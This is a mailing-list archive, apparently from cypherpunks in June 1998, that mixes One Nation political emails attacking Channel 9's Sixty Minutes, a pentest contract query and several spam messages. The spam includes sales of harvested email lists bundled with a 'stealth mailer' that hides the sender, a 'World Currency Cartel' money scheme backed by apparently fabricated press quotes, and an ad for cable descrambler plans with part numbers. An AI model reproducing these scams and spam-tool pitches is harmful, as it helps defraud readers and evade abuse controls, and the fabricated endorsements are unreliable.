Message-ID: <1.5.4.32.19980605221229.0070d830@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation Supporter in NSW,

PLEASE READ THIS EXTREMELY IMPORTANT MESSAGE and CIRCULATE WIDELY TO ALL YOU
CAN.

In the lead up to the Queensland State and Federal Elections there has been
growing hysteria in the media, major political parties and by minority
groups that "support for Pauline Hanson's One Nation is somehow bad for
Australia".

It should be of no surprise that One Nation has one goal in mind and that is
to bring equity in treatment back to ALL Australians irrespective of colour,
race, or creed. If you read the first sentence again you will see who is
going to 'lose' when divisive policies are removed by One Nation from the
Australian equation.

However, the most divisive force in Australia today is the mainstream media,
carefully controlled by men of enormous wealth who now seek the ultimate
prize, 'power over the politicians who run Australia'.

Many believe that they have already achieved this goal. Many believe that
the support for Pauline Hanson's One Nation  is a direct result of
'populist' Australians (that's you and me) seeing through the deals being
done between the major political parties and the media barons.

Today Australians face a real fight to retain their democratic rights in the
face of the media moguls. This is the 'real' media-hidden war that is being
raged right now with Pauline Hanson being the focus, the enemy. The coming
Queensland state and Federal elections are not over 'race' as the media
would have you believe, they are over our freedom of speech and democracy
which has already being largely destroyed through the concentration of our
media.

Last Tuesday Pauline Hanson raised the issue of 'The Draft Declaration on
the Rights of Indigenous Peoples' in Parliament. 

What followed was the most disgraceful vilification by Howard, Beazley,
supported by the media, of Pauline Hanson, the messenger, while the message
- the potential impact of this treaty on all Australians - was totally ignored.

This vilification was epitomised by the live interview with Ray Martin on
Channel 9's 'A Current Affair' during which he changed the 'rules of
engagement' previously agreed to. The interview was supposed to be about
Pauline's speech in parliament and the ramifications of the UN draft agreement.

A range of links to documents related to Pauline Hanson's speech can be seen at:

http://www.gwb.com.au/un.html

Channel 9 have used these tactics before to secure an interview under
blatantly dishonest terms. Sixty Minutes approached Pauline Hanson to do a
'prime time' broadcast on 'a new political party in the making'... in 1997.
The original letter to David Ettridge confirming the 'rules of engagement'
with Pauline Hanson can be seen at this link:

http://www.gwb.com.au/gwb/news/onenation/letter.gif

In both Channel 9 interviews Pauline Hanson has appeared stunned, was
ridiculed by those interviewing her and thereafter denigrated by many of her
opponents. Quite simply she has been ambushed with unrelated questioning by
a less than ethical media doing the bidding of powers higher up.

This Sunday Channel 9's 'Sixty Minutes' has intimated that it will be doing
an 'expose' on Pauline Hanson's One Nation links to 'American influences'.
As of late yesterday they had refused to supply the source of their
information so that One Nation could respond. It will be an interesting time
for 'Sixty Minutes' to carry such a damaging, unsubstantiated programme,
less than a week before the Queensland state election.

The background to the programme to be run tomorrow can be seen at:
http://sixtyminutes.ninemsn.com.au/news/17029.asp

Here is a quote from that page:
'But as 60 Minutes has discovered, Pauline Hanson's one nation has little to
do with our nation. Much of her ideology is borrowed from loony extremists
in the United States, right down to her claim this week that the UN was
undermining Australia's sovereignty. Jeff McMullen reports that this fear of
a UN-led global world order is the central theme in the thinking of militia
groups at war with the US Government. And the militia leaders admit they
know and admire Pauline Hanson and have advised her supporters.'

With this in mind I would ask you to take this personal assurance from me. 

I have been privileged to get to know Pauline and understand the fire that
burns within her for Australia and her children, our future. She is not
influenced by anybody from overseas, her gun laws actually tighten gun
control through

"an instant record check to ensure those persons ineligible to own a firearm
can be quickly identified; we shall establish a register of persons
prohibited from firearm ownership. Prohibited persons: ie those convicted of
a violent offence."
 
See: http://www.gwb.com.au/onenation/press/guns.html  

Pauline's aims are to work for the return of Australia to Australians - away
from the negative, direct influence of overseas-based multinationals; to
introduce Citizen Based Referendums; to allow you to have a real say in your
future (One Nation's policies can be seen at:
http://www.gwb.com.au/onenation/policy.html) and to dismantle the power
blocks controlled by the media barons.

It is this last goal which is behind the vilification of Pauline Hanson by
the media and what she stands for, not the opinions expressed by those who
do their master's bidding.

You may like to tell 'Sixty Minutes' what you think of their programme, if
so use this link:

http://sixtyminutes.ninemsn.com.au/60m/content/email.asp

PLEASE BROADCAST THIS EMAIL WIDELY


A personal message from

Scott Balson, Pauline Hanson's One Nation web master

One Nation home page:
http://www.gwb.com.au/onenation





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Bishop <martybishop@yahoo.com>
Date: Sat, 6 Jun 1998 18:59:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Tigerteam Contract
Message-ID: <19980607015916.1565.rocketmail@send1e.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


A request for all tigerteam specialists:

If any of you has access to a sample of a tigerteam contract (a
company orders an attempt to break into their information system) -
for any country - preferably

European, I would very much appreciate you directing me to it (or
sending it). I

have assembled a team of various security specialists but really
wouldn't like to step into some legal trap that may have been avoided.
My primary concerns
are:

- attempt to "steal" information that the company considers
confidential or classified (are they allowed to authorize such attempt
at all and who gets
sued if they can't but do it anyway)
- possible hinderance or partial destruction of company's information
system - software, data, functionality (e.g. when conducting highly
violent attacks)
- using forged identity (very handy when doing social engineering but
what is the legal aspect of it?)
- "attacking" company's employees (can a company authorize someone to
do a background research on their employees, to hack into their home
computers as well, to social engineer them out-of-work, to abduct and
threaten them etc.?)
- protecting from your own team members (trust nobody: a member of my
team could eventually - under threat or some other pressure - insert a
backdoor/trojan/virus
etc. into the company's information system)

Thank you in advance for your answers and have a nice day.

Please respond to me directly or CC.

Martin Bishop





_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Sat, 6 Jun 1998 16:40:23 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: FBI Video
Message-ID: <544efa54.3579d342@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill had a correction for me (Thanks Bill!).  That cypherpunks survailance
video is only 416k (I've got .MP3 sizes on my mind, sorry)

Download it if you haven't seen it -

http://www.cnbc.com/moreinfo/badday.mpeg

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Sat, 6 Jun 1998 03:26:22 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Statement on Sixty Minutes by Pauline Hanson
Message-ID: <1.5.4.32.19980606101637.0084b320@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sat, 6 Jun 1998 20:00:04 +1000 

NEWS RELEASE

6/6/98
60 minutes' Fairytales

"This Sunday, 60 Minutes is airing a segment devoted to connecting
Pauline Hanson with individuals or groups in the United States. While we
don't know who these people are, what is certain is that Pauline Hanson
is not in contact politically or organisationally with anyone in the
United States - the 60 Minutes story is a fairytale.

After hearing of an advertisement for this Sunday's 60 minutes, David
Oldfied contacted the programme to check its content. Despite making it
clear there was absolutely no communication between Pauline Hanson, her
advisers, or the organisation's heads and anyone in the United States,
60 minutes refused to even consider they had manufactured the story.
They also refused to allow One Nation an opportunity to rebut their
fairytale until the programme the following week. This is a nefariously
timed lie. 

This is deceptive and dishonest journalism at its worst and all credible
journalists, whatever their personal feelings, should be appalled at 60
minutes' approach. Regardless of what evidence 60 Minutes produce or
what they may state, the whole story is a fairytale fabricated without
the slightest basis of truth. There is no connection or communication
between the United States and Pauline Hanson or One Nation.

While we have no knowledge of such activities, it is possible some
individual member may be in contact with people overseas but this, if it
has happened, is a personal affair and unrelated to us as an
organisation.

It should also be understood that One Nation letterhead and other
documents have been forged on a number of occasions. Further to this,
people have falsely claimed to be party officials and candidates as well
as one incident where a person in Western Australia claimed to be a
close personal adviser to Pauline when in fact she had never even met
him.

We are not sure what 60 minutes will put to air, but having spoken to
them twice, it is clear they will peddle the lie of links that simply do
not exist. Perhaps they have cleverly manufactured a fairytale with the
help of people either willing to perjure themselves or who are just not
aware they are not really in contact with Pauline or One Nation, but
whatever the case, their story is fiction in the 1st, 2nd and 3rd
degree.

60 minute's refusal of an opportunity for us to face their fairytale on
their programme this Sunday night, in itself, proves their intention to
simply maliciously attack Pauline and One Nation by any means regardless
of the total lack of truth. 60 minutes has no credibility and should be
treated accordingly. Even their Internet story announcing their
programme is filled with lies when factual evidence is clearly available
by speaking to us, something they chose not to do because the truth
would ruin their dishonest and despicable claims."   

"Pauline Hanson and One Nation is, and will always be, 100% Australian
owned and 100% Australian influenced."

Statement issued by request of Pauline Hanson MP. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kip@bdi.sem.hhs.nl
Date: Sat, 6 Jun 1998 05:05:52 -0700 (PDT)
To: kip@bdi.sem.hhs.nl
Subject: JUST RELEASED!  10 Million!!!
Message-ID: <011297055501222@g_fantasm.com>
MIME-Version: 1.0
Content-Type: text/plain



IT WAS JUST RELEASED!!
 
INTRODUCING...MILLIONS VOL. 1A

We took a total of over 92 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in excess of 100+ million addresses
in one huge file.

We then ran a super "sort/de-dupe" program against this huge list.
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public
by putting numerous files of addresses in the CD over and over. This
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc.
This causes a tremendous amount of undeliverables, and for  those
that use Stealth programs, clogs up servers quickly with trash, etc.

We then ran a program that contained 1800+ keywords to remove
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
.mil, .org, .gov, etc.   After that list was run against the remaining list,
it  reduced it down to near 10 million addresses!

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot less money and
alot less time!!

We also purchased Cyber-Promos ($995.00) CD.  We received it just
prior to finishing production work on the new CD.  We had our people
take a random sample of 300,000 addresses  from the touted 2.9 that
they advertised.   We used a program that allows us to take a random
sample of addresses from any list.  We were able to have the program
take every 9th address, thus giving us a 300,000 list of Cyber's email
addresses from top to bottom.  We cleaned these, and came up with about
100,000 addresses. These are also mixed in.

We also included a 6+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes.

 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What others are saying:
 
"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over
the course of the weekend, I emailed out over 500,000 emails and I
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX

"This list is worth it's weight in gold!!  I sent out 100,000 emails for my
product and received over 55 orders!

Ann Colby
New Orleans, LA

****************************************
 
                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 10 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 5,000 (no codes needed to open files).
All files are separated by domain name for your convenience.
 
PLUS you receive a tremendous REMOVE list!
6 Million+ 

>>> NOW ONLY $150.00!

This price is effective for the next seven days, thereafter the price will be
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove
Requests.
 
The result is the Cleanest Email Addresses Available Anywhere
to use over and over again, for a FRACTION of the cost that other
companies charge. Typical rates for acquiring email lists are from
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.


***ADDED BONUS***
All our customers will have access to our updates on the CD volume
they purchase.  That's right, we continually work on our CD.  Who 
knows when those other CDs were made. We're constantly adding 
and deleting addresses, removes. Etc.  It all comes back to quality.  
No one else offers that! 

Don't even hesitate on this one or you will miss out on the most
effective way to market anywhere...PERIOD!

If you have any further questions or to place an order by
phone, please do not hesitate to call us at:

                              800-600-0343  Ext. 2693

To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax.
 
 _________________
EZ Order Form
 

 _____Yes! I would like to order MILLIONS Vol. 1A email addresses
for only $150.00.
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-212-504-8192
 

CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-212-504-8192

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-212-504-8192
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.  (7-10 days)
Make payable to: "GD Publishing"
 










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: favvafeephjmg.com@uk.newbridge.com
Date: Sat, 6 Jun 1998 23:23:51 -0700 (PDT)
To: Friend@public.com
Subject: E-Mail anything to 57 million people for only $99
Message-ID: <76cd44dbs84f81co640a655aa@myweb.com>
MIME-Version: 1.0
Content-Type: text/plain


                                          57 MILLION EMAILS FOR ONLY $99 
                                             INCLUDES STEALTH MAILER  

      That's right, I have 57 Million  Fresh  email addresses that I will sell for only $99. These are all fresh addresses that include almost every person on the internet today,  with no duplications.  They are all sorted and ready to be mailed.  That is the best deal anywhere today !  Imagine selling a product for only $5 and getting  only a 1/10% response.   That's  $2,850,000  in your pocket !!! 
Don't believe it? People are making that kind of money right now by doing the same thing, that is why you get so much email from people selling you their product....it works !  I will even tell you how to mail them with easy to follow step-by-step instruction I include with every order.  These 57 Million email addresses are yours to keep, so you can use them over and over and they come on 1 CD.  
I will also include the stealth mailer - this is a full version of the incredibly fast mailing program that hides your email address when you send mail so no one will find out where it came from and you won't lose your dial up account.  The stealth mailer is an incredible program and absolutly FREE with your order !  
If you are not making at least $50,000 a month, then ORDER NOW. 
ORDER NOW BY FAX:  Simply print out this order form and fax it to us along with  your check made payable to: Cyber Bulk  for only $99.  Our Fax # is:  760 430 2220

We will confirm your order by email and then mail your cd out via priority mail.

Name:_____________________________

Street Address:______________________________

City:_____________________       

State:________________ZipCode:_____________

Phone number:__________________________

Email:_______________________________

Tape your check here.  Returned checks are subject to $25 NSF Fee.
                Fax it to   760 430 2220
                                Or
You can mail a check or money order to:

Cyber Bulk
167 Hamilton ST
Oceanside, CA 92054



If you want to be removed from our mailing list just send a email here








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sahazali@ew.mimos.my
Date: Sat, 6 Jun 1998 11:13:39 -0700 (PDT)
To: sahazali@ew.mimos.my
Subject: Find out what "They" don't want you to know!!!
Message-ID: <011297033301222@g_fantasmimages.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Friend:

If you have already responded to the following announcement a few
days ago, that means your package is already on its way and it
should be arriving soon! If you have not responded to this before,
please pay attention to it now. This is very important!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
IMPORTANT ANNOUNCEMENT
IMPORTANT ACCOUNCEMENT
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 '''''''''''''''''''''''''''
Your future May Depend on it !
 
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
Before you know about this 'Important Announcement', you must
first read the following 'Editorial Excerpts' from some important
publications in the United States:

NEW YORK TIMES: "In concluding our review of Financial
organizations to effect change in the 90's, special attention
should be called to a California based organization, 'WORLD
CURRENCY CARTEL'. Members of this organization are amassing
hundred of millions of dollars in the currency market using a very
LEGAL method which has NEVER been divulged to the general public.
While their purpose is not yet known, their presence has most
certainly been felt".
 
NBC NIGHTLY NEWS: "Members of 'World Currency Cartel', who always
keep a low profile, are considered to be some of the most
wealthiest people in North America".

More excerpts later, but first let us give you this very
'IMPORTANT ANNOUNCEMENT":
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 '''''''''
We are glad to announce that for the first time and for a very
short period of time, WORLD CURRENCY CARTEL will instruct a
LIMITED number of people worldwide on 'HOW TO CONVERT $25 INTO ONE
HUNDRED OF LEGAL CURRENCY'. We will transact the first conversion
for you, after that you can easily and quickly do this on your own
hundreds or even thousands of times every month.
TAKE ADVANTAGE OF THIS "SECRET FLAW" !
******************************************************************
******************************************************************
***
 
It is even more explosive than we have yet disclosed. While
currency does fluctuate daily, we can show you 'HOW TO CONVERT $99
INTO $588 AS MANY TIMES AS YOU WANT'. That means, you will be able
to EXCHANGE $99, AMERICAN LEGAL CURRENCY DOLLARS, FOR $580 OF THE
SAME. You can do this as many times as you wish, every day, every
week, every month. All very LEGAL and effortlessly!
 
It takes only 5 to 10 minutes each time you do this. You can do
this from home, office or even while traveling. All you need is
an access to a phone line and an address. Best of all, you can do
this from ANY CITY ON THIS EARTH!!!
 
Again, we must reiterate, anyone can do this and the source is
NEVER-ENDING. For as long as the global financial community
continues to use different currencies with varying exchange rates,
the "SECRET FLAW" will exist.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>
As we said earlier , we will do the first transaction for you and
will show you exactly how to do this on your own, over and over
again!
 
The amount of exchange you would do each time is entirely up to
you. Working just 2 to 10 hours a week, you can soon join the list
of Millionaires who do this on a daily basis many times a day. The
transaction is so simple that even a high school kid can do it!
 
We at the World Currency Cartel would like to see a uniform global
currency backed by Gold. But, until then, we will allow a LIMITED
number of individuals worldwide to share in the UNLIMITED PROFITS
provided for by the world currency differentials.
 
We will espouse no more political views nor will we ask you to do
so. We can say however, that our parent organization, NDML,
benefits greatly by the knowledge being shared, as we
ourselves, along with YOU, benefit likewise. Your main concern
surely will be, how you will benefit.

As soon as you become a member, you will make transactions from
your home, office, by telephone or through the mail. You can
conduct these transactions even while traveling.

Don't believe us? Experience it for yourself!
  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Unlike anyone else, we will assure you great financial freedom and
you will add to our quickly growing base of supporters and join
the list of MILLIONAIRES being created using this very "SECRET
FLAW" in the world currency market.
******************************************************************
******************************************************************
***

DON'T ENVY US, JOIN US TODAY!!!
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''
There is a one time membership fee of only $195. BUT, if you join
us by June 29th, 1998, you can join us for only $25 administrative cost. 
Your important documents, instructions, contact name/address, phone
number and all other pertinent information will be mailed to you
immediately. So take advantage of our Anniversary date and join us
today.
 
(If you are replying after June 29th, you must pay $195.00 for
the membership fee. NO EXCEPTIONS, and no more E-mail inquiries
please).

Upon becoming a member, you promise to keep all infos
CONFIDENTIAL!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~
Should you choose to cancel your membership for any reason, you
must return all papers/documents for a refund within 60 days.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~--
 
IMPORTANT:
****************
 
1...Please write your name & mailing address VERY CLEARLY on a
     paper
2...Below your mailing address, please write your E-mail address
3...At the top left hand corner, please write the words "NEW
     MEMBER" 
4...Attach a CHECK or MONEY ORDER for $25 + $10 for the shipping 
     and handling of documents (TOTAL = $35.00)  Outside US add $10 (TOTAL  = $45) 
     PAYABLE TO "EBSN" and mail to:

                  EBSN
                  PO BOX 66
                  ROSELLE PARK, NJ 07204
 
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}

Here are some more 'Editorial Excerpts':
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WALL STREET: "A discreet group of Americans, operating under the
guise of World Currency Cartel have recently begun making rumbles in
world finance market. While at this time, their game is not completely
known, they certainly will be watched by those making major moves in the
currency contracts".

FINANCIAL WEEK: "Watch them, monitor them, extract their knowledge
and try to become one of them. That is the soundest financial
advice we could give to anyone".

NATIONAL BUSINESS WEEKLY: "While this reporter has been left in
the cold as to its method of operation, we have been able to
confirm that 'World Currency Cartel' and its members are literally
amassing great fortunes overnight".

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$END$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
We thankfully credit DIAMOND INT. for the content of this
IMPORTANT ANNOUNCEMENT.
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Sat, 6 Jun 1998 13:26:58 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Toyota - Sixty Minutes' sponsors need to know
Message-ID: <1.5.4.32.19980606202036.00b43b7c@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporters

Toyota are the bona-fide sponsors of Sixty Minutes. 

Further to our email yesterday about their coverage of Pauline Hanson
tonight, ****I would encourage**** you to take a moment to send your message
of concern about the unethical behaviour of this Channel 9 programme and
express yours views clearly on how you feel this might reflect on their
business.

Here is Toyota's email address:

toyota@spike.com.au

GWB


Scott Balson

Here is a copy of the email sent to you yesterday from Pauline Hanson:

NEWS RELEASE

6/6/98
60 minutes' Fairytales

"This Sunday, 60 Minutes is airing a segment devoted to connecting
Pauline Hanson with individuals or groups in the United States. While we
don't know who these people are, what is certain is that Pauline Hanson
is not in contact politically or organisationally with anyone in the
United States - the 60 Minutes story is a fairytale.

After hearing of an advertisement for this Sunday's 60 minutes, David
Oldfied contacted the programme to check its content. Despite making it
clear there was absolutely no communication between Pauline Hanson, her
advisers, or the organisation's heads and anyone in the United States,
60 minutes refused to even consider they had manufactured the story.
They also refused to allow One Nation an opportunity to rebut their
fairytale until the programme the following week. This is a nefariously
timed lie. 

This is deceptive and dishonest journalism at its worst and all credible
journalists, whatever their personal feelings, should be appalled at 60
minutes' approach. Regardless of what evidence 60 Minutes produce or
what they may state, the whole story is a fairytale fabricated without
the slightest basis of truth. There is no connection or communication
between the United States and Pauline Hanson or One Nation.

While we have no knowledge of such activities, it is possible some
individual member may be in contact with people overseas but this, if it
has happened, is a personal affair and unrelated to us as an
organisation.

It should also be understood that One Nation letterhead and other
documents have been forged on a number of occasions. Further to this,
people have falsely claimed to be party officials and candidates as well
as one incident where a person in Western Australia claimed to be a
close personal adviser to Pauline when in fact she had never even met
him.

We are not sure what 60 minutes will put to air, but having spoken to
them twice, it is clear they will peddle the lie of links that simply do
not exist. Perhaps they have cleverly manufactured a fairytale with the
help of people either willing to perjure themselves or who are just not
aware they are not really in contact with Pauline or One Nation, but
whatever the case, their story is fiction in the 1st, 2nd and 3rd
degree.

60 minute's refusal of an opportunity for us to face their fairytale on
their programme this Sunday night, in itself, proves their intention to
simply maliciously attack Pauline and One Nation by any means regardless
of the total lack of truth. 60 minutes has no credibility and should be
treated accordingly. Even their Internet story announcing their
programme is filled with lies when factual evidence is clearly available
by speaking to us, something they chose not to do because the truth
would ruin their dishonest and despicable claims."   

"Pauline Hanson and One Nation is, and will always be, 100% Australian
owned and 100% Australian influenced."

Statement issued by request of Pauline Hanson MP. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reoru89@demeter.psych.uw.edu.pl (THE HOBBY PROS)
Date: Sat, 6 Jun 1998 23:16:29 -0700 (PDT)
To: reoru89@demeter.psych.uw.edu.pl
Subject: CABLE DECSRAMBLER  Now Only  $6.00 !!
Message-ID: <199806063592AAA6754@564897845784511@Inovations.com.inmh.ro>
MIME-Version: 1.0
Content-Type: text/plain


This is really cool!                    

                PREMIUM CHANNELS and PAY PER VIEW EVENTS              

                                            **** FREE ****



EASY to assemble plans for only $6.00 !
We will send your plans the day we receive your order!


YOU WILL BE WATCHING HBO, SHOWTIME, 
THE MOVIE CHANNEL, Pay per view events, Adult stations,
and any other scrambled signal   NEXT WEEK!

You can EASILY assemble a cable descrambler in less than 30 minutes!
You have probably seen many advertisments for similar plans....

 
BUT OURS are BETTER! 

We have compared it to all the others and have actually
IMPROVED the quality and SIMPLIFIED the design !!!


**  We even include PHOTOS! **


OUR PLANS ARE BETTER! 
We have NEW, EASY TO READ,EASY to assemble plans for only $6.00! 
We have seen them advertised for as much as $29.00 and you have 
to wait weeks to receive them!       


WHAT THE OTHERS SAY IS TRUE!

Parts are available at "The R***O S***k" Trademark rights 
do not allow us to use a national electronics retail chains' name
but there is one in your town!


Call and ask them BEFORE you order! 
They are very familiar with these plans and 
will tell you that it.......

       DOES INDEED WORK!    ASK THEM! 


You will need part #'s

 270-235 
 271-1325 
 278-212
 RG59 coaxial cable,
 #12 copper wire, 
 and a variable capacitor.


     They may have to  special order the variable capacitor....
     But WHY WAIT for a special order?  WE have them!
  

  **  WE have secured a supply of the capacitors directly from
      the manufacturer,   and We WILL include one with your plans
       for an ADDITIONAL  $10.00 only!


 It is LEGAL, providing of course you use these
 plans for educational purposes only.

 IT'S FUN!  


We're sure you'll enjoy this!  Our FAMILIES sure do!                           
               * you need one descrambler for each TV.


                   NO MORE MONTHLY BILLS!           

                 $ 6.00     for plans only                        
                
                $10.00     for variable capacitor only            

                $16.00     for The easy to assemble plans and one variable capacitor!	

                 


Pay by check or money order payable to:           

        The Hobby Pros           
        336 Bon Air Center #254           
        Greenbrae, Ca.           
        94904          		            


Please provide a self addressed stamped envelope (.64)          

So we can RUSH your order to you!













ot3
^^




























   If this E-mail offends anyone, we apologize ......and feel free to use the DEL key.










 "By deleting your unwanted E-Mail you waste one key stroke, yet by 
throwing away paper mail you waste a planet! SAVE OUR TREES and
 support internet E-Mail instead of traditional mail"! 
^^





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s955349@mailserv.cuhk.edu.hk
Date: Sat, 6 Jun 1998 23:20:57 -0700 (PDT)
To: 785@theworld1.net
Subject: What "THEY" Don't Want You To Find Out!!
Message-ID: <53556360_13892432>
MIME-Version: 1.0
Content-Type: text/plain



Dear Friend:

If you have already responded to the following announcement a few
days ago, that means your package is already on its way and it
should be arriving soon! If you have not responded to this before,
please pay attention to it now. This is very important!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
                     IMPORTANT ANNOUNCEMENT

                     IMPORTANT ANNOUNCEMENT

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
                  Your future May Depend on it!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Before you know about this 'Important Announcement', you must
first read the following 'Editorial Excerpts' from some important
publications in the United States:

NEW YORK TIMES: "In concluding our review of Financial
organizations to effect change in the 90's, special attention
should be called to a California based organization, 'WORLD 

CURRENCY CARTEL'. Members of this organization are amassing
hundred of millions of dollars in the currency market using a very
LEGAL method which has NEVER been divulged to the general public.
While their purpose is not yet known, their presence has most
certainly been felt".

NBC NIGHTLY NEWS: "Members of 'World Currency Cartel', who always
keep a low profile, are considered to be some of the most
wealthiest people in North America".

More excerpts later, but first let us give you this very

"IMPORTANT ANNOUNCEMENT":

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

We are glad to announce that for the first time and for a very
short period of time, WORLD CURRENCY CARTEL will instruct a
LIMITED number of people worldwide on 'HOW TO CONVERT $25 INTO 
ONE HUNDRED OF LEGAL CURRENCY'. We will transact the first
